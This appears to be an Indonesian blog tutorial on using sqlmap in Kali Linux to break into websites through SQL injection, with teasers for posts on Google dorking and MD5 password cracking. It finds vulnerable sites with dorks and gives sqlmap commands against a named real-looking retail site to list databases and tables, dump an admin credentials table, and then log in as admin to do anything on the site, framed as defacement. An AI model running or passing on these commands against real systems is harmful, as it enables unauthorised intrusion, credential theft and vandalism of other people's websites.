CARA MENGGUNAKAN SQLMAP DI KALI INUX



sebelum melakukan hacking jangan lupa siapkan target yang sudah vuln terhadap sql injection
bisa mencarinya dengan google dork atau menggunakan uniscan , owasp-zap, nikto , vega dll

download google dork disini

http://www.4shared.com/office/EST7GaQ2ba/dork_sql.html

jika sudah mendapatkan target

1. buka terminal
jika ingin melihat option pada sqlmap
ketik dengan perintah : sqlmap -h



2. untuk melakukan hacking berikan perintah :

sqlmap -u http://www.target.com/syntaxerrorr=2

CONTOH:

sqlmap -u http://www.skechers.com.hk/product.php?id=1152 –dbs



disini menandakan bahwa website tersebut vuln & jika ada pesan berikut tekan y lalu enter



di dalam kasus saya, saya mendapatkan 2 buah database & copy database tersebut untuk melanjutkan sql



3. lanjutkan lagi dengan perintah
untuk melihat isi tables

sqlmap -u http://www.target-anda.com/php?id=sekian -D database-target –tables

CONTOH:
sqlmap -u www.skechers.com.hk/product.php?id=1152 -D skechers_ztagedb –tables

bisa langsung lompat untuk melihat columns dengan perintah

sqlmap -u http://www.target-anda.com/php?id=sekian -D database-target –columns

CONTOH :

sqlmap -u www.skechers.com.hk/product.php?id=1152 -D skechers_ztagedb –columns

tetapi dalam kasus saya , saya lupa untuk menggunakan columns
hehehe
oke gak apa-apa kita lanjutkan saja

4. Disini saya sudah mendapatkan tabel serta daftar dari website tersebut
cari table atau columns yang berisikan nama user / admin / password atau apalah yang terhubung dengan username / password



5. saatnya mencari password & user admin
dengan perintah :

sqlmap -u http://www.target-anda.com/php?id=sekian -D database-target -T admin –dump

CONTOH:
sqlmap -u www.skechers.com.hk/product.php?id=1152 -D skechers_ztagedb -T bz_admin –dump



dan secara otomatis sqlmap akan mencari user & password admin yang tersimpan pada website tersebut





6. cari halaman login admin website tersebut & masukan username & password yang telah kita dapatkan



7 . LOGIN



8. masuk ke dalam directory & kalian bebas melakukan apapun pada website tersebut



jika masih kurang jelas dalam penulisan saya
anda bisa menonton video saya disini

https://www.youtube.com/watch?v=1c2Jx25XwBk




Sumber : http://bolak-balek.blogspot.co.id/2015/03/cara-mudah-defacemenggunakan-google-dork.html



Comments

Post a Comment

Popular posts from this blog

PENGERTIAN GOOGLE DORK

Image
CARA MUDAH DEFACE MENGGUNAKAN GOOGLE DORK Diam diam, site ini memberikan kita tools untuk melakukan hacking yang paling berbahaya se antero dunia, walaupun tools google ini hanya bisa memberikan sampai ke level footprinting ada juga yang bisa sampai ke level selanjutnya. kenapa aku sebut dengan tools ? karna kita menggunakan google untuk mencari media yang unsecure, yang mudah di hack yang bolong, yang belum ter update, karna google memiliki kekuatan untuk itu semua. dari tutorial ini yang akan didapatkan adalah: • Bagaimana cara menggunakan google untuk mencari sources dari personal information dan confidential data lainya • Bagaimana cara mencari informasi tentang vulnerable systems and Web services • Bagaimana cara mencari publicly available network devices. Hal pertama dari yang harus di ketahui adalah Google Query Operators Query operator ini berfungsi kasar sebagai filtering search nya google menjadi lebih spesifik berdasarkan query yang kita inginkan, masing masing que...
Keep reading

CARA DECRYPT PASSWORD MD5

Image
Enkripsi : Proses mengamankan suatu  informasi  dengan membuat informasi tersebut tidak dapat dibaca tanpa bantuan pengetahuan khusus ( http://id.wikipedia.org/wiki/Enkripsi ) Deskripsi : Satu kaedah upaya pengolahan  data  menjadi sesuatu yang dapat diutarakan secara jelas dan tepat dengan tujuan agar dapat dimengerti oleh orang yang tidak langsung mengalaminya sendiri. Deskripsi adalah kebalikan dari Enkripsi ( http://id.wikipedia.org/wiki/Deskripsi ) MD5 : MD5 ( Message-Digest algortihm 5 ) ialah fungsi hash kriptografik yang digunakan secara luas dengan  hash value 128-bit. Pada standart Internet (RFC 1321), MD5 telah dimanfaatkan secara bermacam-macam pada aplikasi keamanan, dan MD5 juga umum digunakan untuk melakukan pengujian integritas sebuah berkas. ( http://id.wikipedia.org/wiki/MD5)   Jika Anda tidak mengerti, Anda bisa melihat gambar ini : Praktik : 1. Buka website ini  http://www.md5online.org/ Tampilan web nya seperti ini :...
Keep reading